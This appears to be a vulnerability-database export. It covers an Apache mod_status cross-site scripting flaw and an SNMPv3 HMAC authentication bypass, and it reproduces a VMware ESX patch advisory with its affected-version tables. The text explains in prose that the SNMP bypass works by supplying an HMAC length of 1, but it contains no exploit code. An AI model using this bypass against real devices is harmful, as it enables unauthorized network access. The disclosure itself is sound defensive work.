            "url": "http://www.us-cert.gov/cas/techalerts/ta08-150a.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30430"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31142"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30732"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/33200"
          },
          {
            "trust": 1.1,
            "url": "http://lists.vmware.com/pipermail/security-announce/2009/000062.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/1697"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/0924/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/0809/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/0554"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/0986/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/0047"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/1224/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/0447/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/1623/references"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=130497311408250\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/32800"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/39472"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10272"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/505990/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/498523/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/494428/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/488082/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r84d043c2115176958562133d96d851495d712aa49da155d81f6733be%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r7dd6be4dc38148704f2edafb44a8712abaa3a2be120d6c3314d55919%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 1.0,
            "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8%40%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6388"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5000"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0005"
          },
          {
            "trust": 0.4,
            "url": "http://securityreason.com/achievement_securityalert/50"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-6388"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5000"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0005"
          },
          {
            "trust": 0.3,
            "url": "http://httpd.apache.org/"
          },
          {
            "trust": 0.3,
            "url": "https://www13.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c01607570\u0026admit=109447627+1227181083938+28353475"
          },
          {
            "trust": 0.3,
            "url": " http://www.phptoys.com/product/micro-news.html"
          },
          {
            "trust": 0.3,
            "url": "https://www14.software.ibm.com/webapp/set2/sas/f/hmc/power5/install/v61.readme.html#mh01110"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-233623-1"
          },
          {
            "trust": 0.3,
            "url": "http://www.apache.org/dist/httpd/announcement1.3.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.apache.org/dist/httpd/announcement2.0.html"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2008-026.htm"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2008-031.htm"
          },
          {
            "trust": 0.3,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01364714"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0004.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0005.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0006.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0007.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0008.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0261.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0263.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0523.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0524.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.3,
            "url": "http://www.mandriva.com/security/advisories"
          },
          {
            "trust": 0.3,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.3,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.3,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6421"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6422"
          },
          {
            "trust": 0.2,
            "url": "https://www.hp.com/go/swa"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r7dd6be4dc38148704f2edafb44a8712abaa3a2be120d6c3314d55919@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r84d043c2115176958562133d96d851495d712aa49da155d81f6733be@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f@%3ccvs.httpd.apache.org%3e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://usn.ubuntu.com/575-1/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-2364"
          },
          {
            "trust": 0.1,
            "url": "http://support.openview.hp.com/support.jsp"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6420"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-2939"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vmplayer/vmware-player-2.5.3-185404.i386.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/player25/doc/releasenotes_player253.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1863"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1863"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/download/ace/"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/download/player/"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/security"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/1055"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3304"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/download/ws/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-0040"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/policies/security_response.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3304"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3847"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vmplayer/vmware-player-2.5.3-185404.x86_64.rpm"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/policies/eos.html"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vmplayer/vmware-player-2.5.3-185404.exe"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-5752"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vmplayer/vmware-player-2.5.3-185404.i386.bundle"
          },
          {
            "trust": 0.1,
            "url": "http://download3.vmware.com/software/vmplayer/vmware-player-2.5.3-185404.x86_64.bundle"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0040"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3847"
          },
          {
            "trust": 0.1,
            "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/support/policies/eos_vi.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5752"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4465"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4465"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-6422"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-6421"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.1,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.1,
            "url": "http://itrc.hp.com"
          },
          {
            "trust": 0.1,
            "url": "http://httpd.apache.org/docs/2.0/mod/mod_status.html"
          },
          {
            "trust": 0.1,
            "url": "http://securityreason.com/key/sp3x.gpg"
          },
          {
            "trust": 0.1,
            "url": "http://www.securityfocus.com/archive/1/450418"
          },
          {
            "trust": 0.1,
            "url": "http://securityreason.com"
          },
          {
            "trust": 0.1,
            "url": "http://httpd.apache.org"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2007-6388"
          },
          {
            "db": "BID",
            "id": "27237"
          },
          {
            "db": "PACKETSTORM",
            "id": "62720"
          },
          {
            "db": "PACKETSTORM",
            "id": "89987"
          },
          {
            "db": "PACKETSTORM",
            "id": "80533"
          },
          {
            "db": "PACKETSTORM",
            "id": "62719"
          },
          {
            "db": "PACKETSTORM",
            "id": "62721"
          },
          {
            "db": "PACKETSTORM",
            "id": "72120"
          },
          {
            "db": "PACKETSTORM",
            "id": "62634"
          },
          {
            "db": "PACKETSTORM",
            "id": "63601"
          },
          {
            "db": "NVD",
            "id": "CVE-2007-6388"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2007-6388",
            "ident": null
          },
          {
            "db": "BID",
            "id": "27237",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "62720",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "89987",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "80533",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "62719",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "62721",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "72120",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "62634",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "63601",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2007-6388",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2008-01-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2007-6388",
            "ident": null
          },
          {
            "date": "2008-01-10T00:00:00",
            "db": "BID",
            "id": "27237",
            "ident": null
          },
          {
            "date": "2008-01-17T05:57:19",
            "db": "PACKETSTORM",
            "id": "62720",
            "ident": null
          },
          {
            "date": "2010-05-27T05:11:37",
            "db": "PACKETSTORM",
            "id": "89987",
            "ident": null
          },
          {
            "date": "2009-08-23T16:31:17",
            "db": "PACKETSTORM",
            "id": "80533",
            "ident": null
          },
          {
            "date": "2008-01-17T05:56:17",
            "db": "PACKETSTORM",
            "id": "62719",
            "ident": null
          },
          {
            "date": "2008-01-17T05:59:17",
            "db": "PACKETSTORM",
            "id": "62721",
            "ident": null
          },
          {
            "date": "2008-11-20T19:21:09",
            "db": "PACKETSTORM",
            "id": "72120",
            "ident": null
          },
          {
            "date": "2008-01-15T20:26:59",
            "db": "PACKETSTORM",
            "id": "62634",
            "ident": null
          },
          {
            "date": "2008-02-13T22:27:37",
            "db": "PACKETSTORM",
            "id": "63601",
            "ident": null
          },
          {
            "date": "2008-01-08T18:46:00",
            "db": "NVD",
            "id": "CVE-2007-6388",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2021-06-06T00:00:00",
            "db": "VULMON",
            "id": "CVE-2007-6388",
            "ident": null
          },
          {
            "date": "2015-04-13T21:21:00",
            "db": "BID",
            "id": "27237",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2007-6388",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "network",
        "sources": [
          {
            "db": "BID",
            "id": "27237"
          }
        ],
        "trust": 0.3
      },
      "title": {
        "_id": null,
        "data": "Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 \u0027mod_status\u0027 Cross-Site Scripting Vulnerability",
        "sources": [
          {
            "db": "BID",
            "id": "27237"
          }
        ],
        "trust": 0.3
      },
      "type": {
        "_id": null,
        "data": "xss",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "62720"
          },
          {
            "db": "PACKETSTORM",
            "id": "62719"
          },
          {
            "db": "PACKETSTORM",
            "id": "62721"
          },
          {
            "db": "PACKETSTORM",
            "id": "72120"
          },
          {
            "db": "PACKETSTORM",
            "id": "62634"
          }
        ],
        "trust": 0.5
      }
    }

    VAR-200806-0575

    Vulnerability from variot - Updated: 2026-04-10 21:42

    SNMPv3 HMAC verification in (1) Net-SNMP 5.2.x before 5.2.4.1, 5.3.x before 5.3.2.1, and 5.4.x before 5.4.1.1; (2) UCD-SNMP; (3) eCos; (4) Juniper Session and Resource Control (SRC) C-series 1.0.0 through 2.0.0; (5) NetApp (aka Network Appliance) Data ONTAP 7.3RC1 and 7.3RC2; (6) SNMP Research before 16.2; (7) multiple Cisco IOS, CatOS, ACE, and Nexus products; (8) Ingate Firewall 3.1.0 and later and SIParator 3.1.0 and later; (9) HP OpenView SNMP Emanate Master Agent 15.x; and possibly other products relies on the client to specify the HMAC length, which makes it easier for remote attackers to bypass SNMP authentication via a length value of 1, which only checks the first byte. A vulnerability in the way implementations of SNMPv3 handle specially crafted packets may allow authentication bypass. Net-SNMP is prone to a remote authentication-bypass vulnerability caused by a design error. Successfully exploiting this issue will allow attackers to gain unauthorized access to the affected application. Net-SNMP 5.4.1, 5.3.2, 5.2.4, and prior versions are vulnerable. Net-SNMP is a set of open source Simple Network Management Protocol (Simple Network Management Protocol) software. The software is used to monitor network equipment, computer equipment, UPS equipment, etc. Vulnerabilities exist in Net-SNMP's handling of authentication. SNMPv3 authentication is implemented using HMAC. An attacker could exploit this vulnerability to read and modify any SNMP object accessible using the authenticated credentials logged into the system. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


                   VMware Security Advisory
    

    Advisory ID: VMSA-2008-0017 Synopsis: Updated ESX packages for libxml2, ucd-snmp, libtiff Issue date: 2008-10-31 Updated on: 2008-10-31 (initial release of advisory) CVE numbers: CVE-2008-3281 CVE-2008-0960 CVE-2008-2327


    1. Summary

    Updated ESX packages for libxml2, ucd-snmp, libtiff.

    1. Relevant releases

    ESX 3.0.3 without patch ESX303-200810503-SG ESX 3.0.2 without patch ESX-1006968 ESX 2.5.5 before Upgrade Patch 10 ESX 2.5.4 before Upgrade Patch 21

    NOTE: Extended support (Security and Bug fixes) for ESX 3.0.2 ended on 2008-10-29. Extended support (Security and Bug fixes) for ESX 2.5.4 ended on 2008-10-08.

         Extended support for ESX 3.0.2 Update 1 ends on 2009-08-08. Users
         should plan to upgrade to ESX 3.0.3 and preferably to the newest
         release available.
    
    1. Problem Description

    a. Updated ESX Service Console package libxml2

    A denial of service flaw was found in the way libxml2 processes
    certain content. If an application that is linked against
    libxml2 processes malformed XML content, the XML content might
    cause the application to stop responding.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-3281 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted         any       any      not affected
    
    ESXi           3.5       ESXi     not affected
    
    ESX            3.5       ESX      affected, patch pending
    ESX            3.0.3     ESX      ESX303-200810503-SG
    ESX            3.0.2     ESX      ESX-1006968
    ESX            2.5.5     ESX      ESX 2.5.5 upgrade patch 10 or later
    ESX            2.5.4     ESX      ESX 2.5.4 upgrade patch 21
    
    * hosted products are VMware Workstation, Player, ACE, Server, Fusion.
    

    b. Updated ESX Service Console package ucd-snmp

    A flaw was found in the way ucd-snmp checks an SNMPv3 packet's
    Keyed-Hash Message Authentication Code. An attacker could use
    this flaw to spoof an authenticated SNMPv3 packet.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-0960 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted         any       any      not affected
    
    ESXi           3.5       ESXi     not affected
    
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      ESX 2.5.5 upgrade patch 10 or later
    ESX            2.5.4     ESX      ESX 2.5.4 upgrade patch 21
    
    * hosted products are VMware Workstation, Player, ACE, Server, Fusion.
    

    c. Updated third party library libtiff

    Multiple uses of uninitialized values were discovered in libtiff's
    Lempel-Ziv-Welch (LZW) compression algorithm decoder. An attacker
    could create a carefully crafted LZW-encoded TIFF file that would
    cause an application linked with libtiff to crash or, possibly,
    execute arbitrary code.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-2327 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    hosted         any       any      not affected
    
    ESXi           3.5       ESXi     not affected
    
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      ESX 2.5.5 upgrade patch 10 or later
    ESX            2.5.4     ESX      ESX 2.5.4 upgrade patch 21
    
    * hosted products are VMware Workstation, Player, ACE, Server, Fusion.
    
    1. Solution

    Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file.

    ESX


    ESX 3.0.3 patch ESX303-200810503-SG http://download3.vmware.com/software/vi/ESX303-200810503-SG.zip md5sum: e687313e58377be41f6e6b767dfbf268 http://kb.vmware.com/kb/1006971

    ESX 3.0.2 patch ESX-1006968 http://download3.vmware.com/software/vi/ESX-1006968.tgz md5sum: fc9e30cff6f03a209e6a275254fa6719 http://kb.vmware.com/kb/1006968

    VMware ESX 2.5.5 Upgrade Patch 10 http://download3.vmware.com/software/esx/esx-2.5.5-119702-upgrade.tar.gz md5sum: 2ee87cdd70b1ba84751e24c0bd8b4621 http://vmware.com/support/esx25/doc/esx-255-200810-patch.html

    VMware ESX 2.5.4 Upgrade Patch 21 http://download3.vmware.com/software/esx/esx-2.5.4-119703-upgrade.tar.gz md5sum: d791be525c604c852a03dd7df0eabf35 http://vmware.com/support/esx25/doc/esx-254-200810-patch.html

    1. References

    CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2327


    1. Change log

    2008-10-31 VMSA-2008-0017 Initial security advisory after release of ESX 3.0.3, ESX 3.0.2, ESX 2.5.5 and ESX 2.5.4 patches on 2008-10-30.


    1. Contact

    E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

    This Security Advisory is posted to the following lists:

    • security-announce at lists.vmware.com
    • bugtraq at securityfocus.com
    • full-disclosure at lists.grok.org.uk

    E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

    VMware Security Center http://www.vmware.com/security

    VMware security response policy http://www.vmware.com/support/policies/security_response.html
